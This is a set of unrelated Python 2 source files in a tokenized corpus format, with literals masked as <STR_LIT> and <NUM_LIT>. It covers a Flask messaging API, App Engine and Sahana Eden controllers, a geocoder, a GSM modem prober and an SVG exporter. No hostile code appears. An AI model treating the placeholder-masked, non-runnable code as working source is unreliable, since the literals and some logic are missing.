doc ( ) <EOL> def getMessagesByGroup ( token , groupId ) : <EOL> """<STR_LIT>""" <EOL> if get_user_by_token ( token ) is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> arr = [ ] <EOL> query = Message . all ( ) <EOL> try : <EOL> query . filter ( "<STR_LIT>" , int ( groupId ) ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> for m in query . run ( ) : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> print arr <EOL> arr = sorted ( arr , key = itemgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> for i in arr : <EOL> del i [ '<STR_LIT>' ] <EOL> print arr <EOL> if len ( arr ) != <NUM_LIT:0> : <EOL> return Response ( response = json . dumps ( arr ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> else : <EOL> return Response ( response = [ ] , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT:GET>" ] ) <EOL> @ auto . doc ( ) <EOL> def getAllUserMessages ( token ) : <EOL> """<STR_LIT>""" <EOL> user = get_user_by_token ( token ) <EOL> if user is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> arr = [ ] <EOL> allMsgs = Message . all ( ) <EOL> projectMsgs = copy . deepcopy ( allMsgs ) <EOL> projectMsgs . filter ( '<STR_LIT>' , False ) <EOL> for m in projectMsgs . run ( ) : <EOL> if str ( m . groupId ) in user . courses_id_list : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . 
datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> allMsgs . filter ( '<STR_LIT>' , True ) <EOL> for m in allMsgs . run ( ) : <EOL> if str ( m . groupId ) in user . projects_id_list : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> arr = sorted ( arr , key = itemgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> for i in arr : <EOL> del i [ '<STR_LIT>' ] <EOL> print arr <EOL> if len ( arr ) != <NUM_LIT:0> : <EOL> return Response ( response = json . dumps ( arr ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> else : <EOL> return Response ( response = [ ] , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT>" ] ) <EOL> @ auto . doc ( ) <EOL> def deleteMessage ( token , msgId ) : <EOL> """<STR_LIT>""" <EOL> user = get_user_by_token ( token ) <EOL> if user is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg = Message . get_by_id ( int ( msgId ) ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> if msg is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> if msg . master_id != user . key ( ) . id ( ) : <EOL> return forbidden ( "<STR_LIT>" ) <EOL> db . delete ( msg ) <EOL> db . save <EOL> return no_content ( ) <EOL> @ message_routes . 
route ( '<STR_LIT>' ) <EOL> def documentation ( ) : <EOL> return auto . html ( ) </s>
import json
__author__ = '<STR_LIT>'
from google.appengine.ext import db


class Course(db.Model):
    """Datastore entity describing a course and its membership."""

    courseName = db.StringProperty(required=True)
    campusId = db.IntegerProperty(required=True)
    master_id = db.IntegerProperty(required=True)
    startDate = db.DateProperty(required=True)
    endDate = db.DateProperty(required=True)
    membersId = db.StringListProperty(required=True)

    def to_JSON(self):
        """Serialize this course (including its datastore id) to a JSON string."""
        start = {
            '<STR_LIT>': self.startDate.year,
            '<STR_LIT>': self.startDate.month,
            '<STR_LIT>': self.startDate.day,
        }
        end = {
            '<STR_LIT>': self.endDate.year,
            '<STR_LIT>': self.endDate.month,
            '<STR_LIT>': self.endDate.day,
        }
        data = {
            '<STR_LIT>': self.courseName,
            '<STR_LIT>': self.campusId,
            '<STR_LIT>': self.master_id,
            '<STR_LIT>': start,
            '<STR_LIT>': end,
            '<STR_LIT>': self.membersId,
            'id': self.key().id(),
        }
        return json.dumps(data)
import os
import copy
from FuzzyFilePath.project.FileCache import FileCache
import FuzzyFilePath.project.validate as Validate
import FuzzyFilePath.common.path as Path
import FuzzyFilePath.common.settings as Settings
from FuzzyFilePath.common.verbose import warn
from FuzzyFilePath.common.verbose import verbose

ID = "<STR_LIT>"


class Project():
    """Per-window project state: merged settings plus the file cache."""

    filecache = None

    def __init__(self, window, directory, project_settings, ffp_settings):
        """<STR_LIT>"""
        self.window = window
        self.directory = directory
        self.update_settings(ffp_settings, project_settings)

    def update_settings(self, global_settings, project_settings):
        # Project settings override a deep copy of the global settings.
        merged = copy.deepcopy(global_settings)
        Settings.merge(merged, project_settings)
        self.settings = merged
        self.evaluate_settings()

    def evaluate_settings(self):
        # Resolve the project directory; fall back to the window directory
        # (with a warning) when the configured subfolder does not exist.
        candidate = os.path.join(self.directory, self.get_setting("<STR_LIT>"))
        if os.path.exists(candidate):
            self.project_directory = Path.posix(candidate)
        else:
            self.project_directory = Path.posix(self.directory)
            warn(ID, "<STR_LIT>")

        triggers = self.settings.get("<STR_LIT>", self.get_setting("<STR_LIT>"))
        self.filecache = FileCache(get_valid_extensions(triggers),
                                   self.get_setting("<STR_LIT>"),
                                   self.project_directory)
        self.base_directory = Validate.sanitize_base_directory(
            self.settings.get("<STR_LIT>", "<STR_LIT>"),
            self.project_directory,
            self.directory
        )
        verbose(ID, "<STR_LIT>", self.project_directory)
        verbose(ID, "<STR_LIT>", "'" + self.base_directory + "'")

    def get_directory(self):
        return self.project_directory

    def get_base_directory(self):
        return self.base_directory

    def get_setting(self, key, default=None):
        return self.settings.get(key, default)

    def get_settings(self):
        return self.settings

    def set_setting(self, key, value):
        # Persist into the sublime project file as well as the live settings.
        data = self.window.get_project_data()
        project_ffp_settings = data.get("<STR_LIT>").get("<STR_LIT>")
        project_ffp_settings[key] = value
        self.window.set_project_data(data)
        self.settings[key] = value

    def rebuild_filecache(self):
        verbose(ID, "<STR_LIT>", self.project_directory)
        return self.filecache.rebuild()

    def search_completions(self, needle, project_folder, valid_extensions, base_path=False):
        return self.filecache.search_completions(needle, project_folder, valid_extensions, base_path)

    def find_file(self, file_name):
        return self.filecache.find_file(file_name)


def get_valid_extensions(triggers):
    """<STR_LIT>"""
    collected = set()
    for scope in triggers:
        collected.update(scope.get("<STR_LIT>", []))
    return list(collected)
<s> """<STR_LIT>""" <EOL> module = request . controller <EOL> resourcename = request . function <EOL> if not settings . has_module ( module ) : <EOL> raise HTTP ( <NUM_LIT> , body = "<STR_LIT>" % module ) <EOL> def s3_menu_postp ( ) : <EOL> menu_selected = [ ] <EOL> body_id = s3base . s3_get_last_record_id ( "<STR_LIT>" ) <EOL> if body_id : <EOL> body = s3db . dvi_body <EOL> query = ( body . id == body_id ) <EOL> record = db ( query ) . select ( body . id , body . pe_label , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> label = record . pe_label <EOL> response . menu_options [ - <NUM_LIT:3> ] [ - <NUM_LIT:1> ] . append ( <EOL> [ T ( "<STR_LIT>" ) % dict ( label = label ) , <EOL> False , URL ( f = "<STR_LIT>" , <EOL> vars = dict ( match = record . id ) ) ] <EOL> ) <EOL> menu_selected . append ( <EOL> [ "<STR_LIT>" % ( T ( "<STR_LIT>" ) , label ) , <EOL> False , URL ( f = "<STR_LIT:body>" , args = [ record . id ] ) ] <EOL> ) <EOL> person_id = s3base . s3_get_last_record_id ( "<STR_LIT>" ) <EOL> if person_id : <EOL> person = s3db . pr_person <EOL> query = ( person . id == person_id ) <EOL> record = db ( query ) . select ( person . id , limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> name = s3db . pr_person_id ( ) . represent ( record . id ) <EOL> menu_selected . append ( <EOL> [ "<STR_LIT>" % ( T ( "<STR_LIT>" ) , name ) , <EOL> False , URL ( f = "<STR_LIT>" , args = [ record . id ] ) ] <EOL> ) <EOL> if menu_selected : <EOL> menu_selected = [ T ( "<STR_LIT>" ) , True , None , menu_selected ] <EOL> response . menu_options . append ( menu_selected ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module_name = settings . modules [ module ] . name_nice <EOL> except : <EOL> module_name = T ( "<STR_LIT>" ) <EOL> btable = s3db . dvi_body <EOL> itable = s3db . dvi_identification <EOL> query = ( btable . deleted == False ) <EOL> left = itable . on ( itable . pe_id == btable . 
pe_id ) <EOL> body_count = btable . id . count ( ) <EOL> rows = db ( query ) . select ( body_count , <EOL> itable . status , <EOL> left = left , <EOL> groupby = itable . status ) <EOL> numbers = { None : <NUM_LIT:0> } <EOL> for row in rows : <EOL> numbers [ row [ itable . status ] ] = row [ body_count ] <EOL> total = sum ( numbers . values ( ) ) <EOL> dvi_id_status = dict ( s3db . dvi_id_status ) <EOL> dvi_id_status [ None ] = T ( "<STR_LIT>" ) <EOL> statistics = [ ] <EOL> for status in dvi_id_status : <EOL> count = numbers . get ( status ) or <NUM_LIT:0> <EOL> statistics . append ( ( str ( dvi_id_status [ status ] ) , count ) ) <EOL> response . title = module_name <EOL> return dict ( module_name = module_name , <EOL> total = total , <EOL> status = json . dumps ( statistics ) ) <EOL> def recreq ( ) : <EOL> """<STR_LIT>""" <EOL> table = s3db . dvi_recreq <EOL> table . person_id . default = s3_logged_in_person ( ) <EOL> def prep ( r ) : <EOL> if r . interactive and not r . record : <EOL> table . status . readable = False <EOL> table . status . writable = False <EOL> table . bodies_recovered . readable = False <EOL> table . bodies_recovered . writable = False <EOL> return True <EOL> s3 . prep = prep <EOL> output = s3_rest_controller ( ) <EOL> return output <EOL> def morgue ( ) : <EOL> """<STR_LIT>""" <EOL> morgue_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:body>" ) , <EOL> ] <EOL> rheader = S3ResourceHeader ( [ [ ( T ( "<STR_LIT>" ) , "<STR_LIT:name>" ) ] <EOL> ] , tabs = morgue_tabs ) <EOL> def prep ( r ) : <EOL> s3db . gis_location_filter ( r ) <EOL> if r . interactive and r . id and not r . component : <EOL> field = r . table . obsolete <EOL> field . readable = field . writable = True <EOL> return True <EOL> s3 . prep = prep <EOL> output = s3_rest_controller ( rheader = rheader ) <EOL> return output <EOL> def body ( ) : <EOL> """<STR_LIT>""" <EOL> gender_opts = s3db . 
pr_gender_opts <EOL> gender_opts [ <NUM_LIT:1> ] = T ( "<STR_LIT>" ) <EOL> ntable = s3db . pr_note <EOL> ntable . status . readable = False <EOL> ntable . status . writable = False <EOL> dvi_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:image>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader = S3ResourceHeader ( [ [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" ] , <EOL> ] , <EOL> tabs = dvi_tabs ) <EOL> return s3_rest_controller ( rheader = rheader ) <EOL> def person ( ) : <EOL> """<STR_LIT>""" <EOL> table = s3db . pr_person <EOL> s3 . crud_strings [ "<STR_LIT>" ] . update ( <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) , <EOL> msg_no_match = T ( "<STR_LIT>" ) ) <EOL> s3db . configure ( "<STR_LIT>" , <EOL> list_fields = [ "<STR_LIT:id>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ) <EOL> s3db . configure ( "<STR_LIT>" , <EOL> deletable = False , <EOL> editable = False , <EOL> listadd = False , <EOL> list_fields = [ "<STR_LIT:id>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ) <EOL> def prep ( r ) : <EOL> if not r . id and not r . method and not r . component : <EOL> body_id = r . get_vars . get ( "<STR_LIT>" , None ) <EOL> body = db ( db . dvi_body . id == body_id ) . select ( <EOL> db . dvi_body . pe_label , limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> label = body and body . pe_label or "<STR_LIT>" % body_id <EOL> if body_id : <EOL> query = dvi_match_query ( body_id ) <EOL> r . resource . add_filter ( query ) <EOL> s3 . 
crud_strings [ "<STR_LIT>" ] . update ( <EOL> msg_no_match = T ( "<STR_LIT>" ) ) <EOL> return True <EOL> s3 . prep = prep <EOL> field = table . missing <EOL> field . readable = False <EOL> field . writable = False <EOL> field . default = True <EOL> table . age_group . readable = True <EOL> table . age_group . writable = True <EOL> if len ( request . args ) == <NUM_LIT:0> : <EOL> s3 . filter = ( db . pr_person . missing == True ) <EOL> mpr_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , None ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:image>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:address>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader = lambda r : s3db . pr_rheader ( r , tabs = mpr_tabs ) <EOL> output = s3_rest_controller ( "<STR_LIT>" , "<STR_LIT>" , <EOL> main = "<STR_LIT>" , <EOL> extra = "<STR_LIT>" , <EOL> rheader = rheader , <EOL> ) <EOL> return output <EOL> def dvi_match_query ( body_id ) : <EOL> """<STR_LIT>""" <EOL> ptable = s3db . pr_person <EOL> ntable = s3db . pr_note <EOL> btable = s3db . dvi_body <EOL> query = ( ( ptable . deleted == False ) & <EOL> ( ptable . missing == True ) & <EOL> ( ntable . pe_id == ptable . pe_id ) & <EOL> ( ntable . status == <NUM_LIT:1> ) ) <EOL> body = btable [ body_id ] <EOL> if not body : <EOL> return query <EOL> if body . date_of_recovery : <EOL> q = ( ( ntable . timestmp <= body . date_of_recovery ) | <EOL> ( ntable . timestmp == None ) ) <EOL> query = query & q <EOL> if body . age_group and body . age_group != <NUM_LIT:1> : <EOL> q = ( ( ptable . age_group == None ) | <EOL> ( ptable . age_group == <NUM_LIT:1> ) | <EOL> ( ptable . age_group == body . age_group ) ) <EOL> query = query & q <EOL> if body . gender and body . gender != <NUM_LIT:1> : <EOL> q = ( ( ptable . gender == None ) | <EOL> ( ptable . 
gender == <NUM_LIT:1> ) | <EOL> ( ptable . gender == body . gender ) ) <EOL> return query <EOL> def tooltip ( ) : <EOL> """<STR_LIT>""" <EOL> formfield = request . vars . get ( "<STR_LIT>" , None ) <EOL> if formfield : <EOL> response . view = "<STR_LIT>" % formfield <EOL> return dict ( ) </s>
<s> """<STR_LIT>""" <EOL> module = request . controller <EOL> resourcename = request . function <EOL> if not settings . has_module ( "<STR_LIT>" ) : <EOL> raise HTTP ( <NUM_LIT> , body = "<STR_LIT>" % module ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> module_name = settings . modules [ module ] . name_nice <EOL> response . title = module_name <EOL> return dict ( module_name = module_name ) <EOL> def brand ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def catalog ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( rheader = s3db . supply_catalog_rheader ) <EOL> def catalog_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def distribution ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def distribution_report ( ) : <EOL> """<STR_LIT>""" <EOL> def prep ( r ) : <EOL> r . method = "<STR_LIT>" <EOL> return True <EOL> s3 . prep = prep <EOL> return s3_rest_controller ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def distribution_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3db . supply_item_controller ( ) <EOL> def item_category ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def item_entity ( ) : <EOL> """<STR_LIT>""" <EOL> return s3db . supply_item_entity_controller ( ) <EOL> def item_pack ( ) : <EOL> """<STR_LIT>""" <EOL> s3db . configure ( "<STR_LIT>" , <EOL> listadd = False , <EOL> ) <EOL> return s3_rest_controller ( ) <EOL> def kit_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) </s>
<s> import xml . dom . minidom <EOL> from urllib import urlencode <EOL> from urllib2 import urlopen <EOL> from geopy import util <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> from django . utils import simplejson as json <EOL> from geopy . geocoders . base import Geocoder <EOL> class GeoNames ( Geocoder ) : <EOL> def __init__ ( self , format_string = None , output_format = None , country_bias = None ) : <EOL> if format_string != None : <EOL> from warnings import warn <EOL> warn ( '<STR_LIT>' + <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> if output_format != None : <EOL> from warnings import warn <EOL> warn ( '<STR_LIT>' + <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> self . country_bias = country_bias <EOL> self . url = "<STR_LIT>" <EOL> def geocode ( self , string , exactly_one = True ) : <EOL> if isinstance ( string , unicode ) : <EOL> string = string . encode ( '<STR_LIT:utf-8>' ) <EOL> params = { <EOL> '<STR_LIT:q>' : string <EOL> } <EOL> if self . country_bias : <EOL> params [ '<STR_LIT>' ] = self . country_bias <EOL> url = self . url % urlencode ( params ) <EOL> return self . geocode_url ( url , exactly_one ) <EOL> def geocode_url ( self , url , exactly_one = True ) : <EOL> page = urlopen ( url ) <EOL> return self . parse_json ( page , exactly_one ) <EOL> def parse_json ( self , page , exactly_one ) : <EOL> if not isinstance ( page , basestring ) : <EOL> page = util . decode_page ( page ) <EOL> doc = json . loads ( page ) <EOL> places = doc . get ( '<STR_LIT>' , [ ] ) <EOL> if not places : <EOL> return None <EOL> if exactly_one and len ( places ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" "<STR_LIT>" % len ( places ) ) <EOL> def parse_code ( place ) : <EOL> latitude = place . get ( '<STR_LIT>' , None ) <EOL> longitude = place . 
get ( '<STR_LIT>' , None ) <EOL> if latitude and longitude : <EOL> latitude = float ( latitude ) <EOL> longitude = float ( longitude ) <EOL> else : <EOL> return None <EOL> placename = place . get ( '<STR_LIT:name>' ) <EOL> state = place . get ( '<STR_LIT>' , None ) <EOL> country = place . get ( '<STR_LIT>' , None ) <EOL> location = '<STR_LIT:U+002CU+0020>' . join ( filter ( lambda x : bool ( x ) , <EOL> [ placename , state , country ] <EOL> ) ) <EOL> return ( location , ( latitude , longitude ) ) <EOL> if exactly_one : <EOL> return parse_code ( places [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return [ parse_code ( place ) for place in places ] </s>
<s> from __future__ import with_statement <EOL> import re <EOL> import datetime <EOL> import time <EOL> import errors <EOL> import threading <EOL> import gsmcodecs <EOL> from gsmmodem import GsmModem <EOL> from devicewrapper import DeviceWrapper <EOL> from pdusmshandler import PduSmsHandler <EOL> from textsmshandler import TextSmsHandler <EOL> class GsmModemNotFound ( Exception ) : <EOL> pass <EOL> class AutoGsmModem ( GsmModem ) : <EOL> """<STR_LIT>""" <EOL> cmd_delay = <NUM_LIT:0.1> <EOL> retry_delay = <NUM_LIT:2> <EOL> max_retries = <NUM_LIT:10> <EOL> modem_lock = threading . RLock ( ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> import prober <EOL> """<STR_LIT>""" <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> proberargs = { '<STR_LIT>' : True } <EOL> else : <EOL> proberargs = { } <EOL> try : <EOL> del kwargs [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> ports = prober . probe ( ** proberargs ) <EOL> if len ( ports ) > <NUM_LIT:0> : <EOL> kwargs [ '<STR_LIT:port>' ] = ports [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> kwargs [ '<STR_LIT>' ] = ports [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT:text>" <EOL> super ( AutoGsmModem , self ) . __init__ ( * args , ** kwargs ) <EOL> else : <EOL> raise GsmModemNotFound ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> conf = dict ( [ <EOL> arg . split ( "<STR_LIT:=>" , <NUM_LIT:1> ) <EOL> for arg in sys . argv [ <NUM_LIT:2> : ] <EOL> if arg . find ( "<STR_LIT:=>" ) > - <NUM_LIT:1> <EOL> ] ) <EOL> print "<STR_LIT>" <EOL> modem = AutoGsmModem ( verbose = True ) <EOL> print "<STR_LIT>" <EOL> while True : <EOL> msg = modem . next_message ( ) <EOL> if msg is not None : <EOL> print "<STR_LIT>" % msg <EOL> msg . respond ( "<STR_LIT>" % <EOL> ( len ( msg . text ) , msg . text ) ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , ) <EOL> import os <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> from gluon import * <EOL> from gluon . contenttype import contenttype <EOL> from gluon . storage import Storage <EOL> from gluon . streamer import DEFAULT_CHUNK_SIZE <EOL> from . . s3codec import S3Codec <EOL> from . . s3utils import s3_unicode , s3_strip_markup <EOL> class S3SVG ( S3Codec ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def extractResource ( self , resource , list_fields ) : <EOL> """<STR_LIT>""" <EOL> title = self . crud_string ( resource . tablename , "<STR_LIT>" ) <EOL> get_vars = Storage ( current . request . get_vars ) <EOL> get_vars [ "<STR_LIT>" ] = len ( list_fields ) <EOL> query , orderby , left = resource . datatable_filter ( list_fields , get_vars ) <EOL> resource . add_filter ( query ) <EOL> data = resource . select ( list_fields , <EOL> left = left , <EOL> limit = None , <EOL> orderby = orderby , <EOL> represent = True , <EOL> show_links = False ) <EOL> rfields = data [ "<STR_LIT>" ] <EOL> types = [ ] <EOL> colnames = [ ] <EOL> heading = { } <EOL> for rfield in rfields : <EOL> if rfield . show : <EOL> colnames . append ( rfield . colname ) <EOL> heading [ rfield . colname ] = rfield . label <EOL> if rfield . virtual : <EOL> types . append ( "<STR_LIT:string>" ) <EOL> else : <EOL> types . append ( rfield . ftype ) <EOL> items = data [ "<STR_LIT>" ] <EOL> return ( title , types , colnames , heading , items ) <EOL> def encode ( self , resource , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if resource . prefix == "<STR_LIT>" and resource . name == "<STR_LIT:location>" : <EOL> list_fields = [ "<STR_LIT>" ] <EOL> else : <EOL> list_fields = [ "<STR_LIT>" ] <EOL> current . s3db . gis_location . wkt . represent = None <EOL> ( _title , types , lfields , headers , items ) = self . 
extractResource ( resource , <EOL> list_fields ) <EOL> wkt = items [ <NUM_LIT:0> ] [ "<STR_LIT>" ] <EOL> if not wkt : <EOL> current . log . error ( "<STR_LIT>" ) <EOL> title = attr . get ( "<STR_LIT:title>" , resource . _ids [ <NUM_LIT:0> ] ) <EOL> filename = "<STR_LIT>" % title <EOL> filepath = self . write_file ( filename , wkt , ** attr ) <EOL> disposition = "<STR_LIT>" % filename <EOL> response = current . response <EOL> response . headers [ "<STR_LIT:Content-Type>" ] = contenttype ( "<STR_LIT>" ) <EOL> response . headers [ "<STR_LIT>" ] = disposition <EOL> stream = open ( filepath ) <EOL> return response . stream ( stream , chunk_size = DEFAULT_CHUNK_SIZE , <EOL> request = current . request ) <EOL> @ staticmethod <EOL> def write_file ( filename , wkt , ** attr ) : <EOL> from xml . etree import ElementTree as et <EOL> iheight = <NUM_LIT> <EOL> height = str ( iheight ) <EOL> iwidth = <NUM_LIT> <EOL> width = str ( iwidth ) <EOL> doc = et . Element ( "<STR_LIT>" , width = width , height = height , version = "<STR_LIT>" , xmlns = "<STR_LIT>" ) <EOL> from shapely . wkt import loads as wkt_loads <EOL> try : <EOL> from shapely import speedups <EOL> speedups . enable ( ) <EOL> except : <EOL> current . log . info ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> shape = wkt_loads ( wkt ) <EOL> geom_type = shape . geom_type <EOL> if geom_type not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> current . log . error ( "<STR_LIT>" , geom_type ) <EOL> return <EOL> from shapely import affinity <EOL> bounds = shape . bounds <EOL> swidth = abs ( bounds [ <NUM_LIT:2> ] - bounds [ <NUM_LIT:0> ] ) <EOL> sheight = abs ( bounds [ <NUM_LIT:3> ] - bounds [ <NUM_LIT:1> ] ) <EOL> width_multiplier = iwidth / swidth <EOL> height_multiplier = iheight / sheight <EOL> multiplier = min ( width_multiplier , height_multiplier ) * <NUM_LIT> <EOL> shape = affinity . scale ( shape , xfact = multiplier , yfact = - multiplier , origin = "<STR_LIT>" ) <EOL> centroid = shape . 
centroid <EOL> xoff = ( iwidth / <NUM_LIT:2> ) - centroid . x <EOL> yoff = ( iheight / <NUM_LIT:2> ) - centroid . y <EOL> shape = affinity . translate ( shape , xoff = xoff , yoff = yoff ) <EOL> if geom_type == "<STR_LIT>" : <EOL> polygons = shape . geoms <EOL> elif geom_type == "<STR_LIT>" : <EOL> polygons = [ shape ] <EOL> points = [ ] <EOL> pappend = points . append <EOL> for polygon in polygons : <EOL> _points = polygon . exterior . coords <EOL> for point in _points : <EOL> pappend ( "<STR_LIT>" % ( point [ <NUM_LIT:0> ] , point [ <NUM_LIT:1> ] ) ) <EOL> points = "<STR_LIT:U+0020>" . join ( points ) <EOL> fill = "<STR_LIT>" <EOL> stroke = "<STR_LIT>" <EOL> et . SubElement ( doc , "<STR_LIT>" , width = width , height = height , fill = fill , stroke = stroke ) <EOL> fill = "<STR_LIT>" <EOL> stroke = "<STR_LIT>" <EOL> et . SubElement ( doc , "<STR_LIT>" , points = points , fill = fill , stroke = stroke ) <EOL> path = os . path . join ( current . request . folder , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( path ) : <EOL> os . makedirs ( path ) <EOL> filepath = os . path . join ( path , filename ) <EOL> with open ( filepath , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( et . tostring ( doc ) ) <EOL> return filepath <EOL> def decode ( self , resource , source , ** attr ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> return root </s>
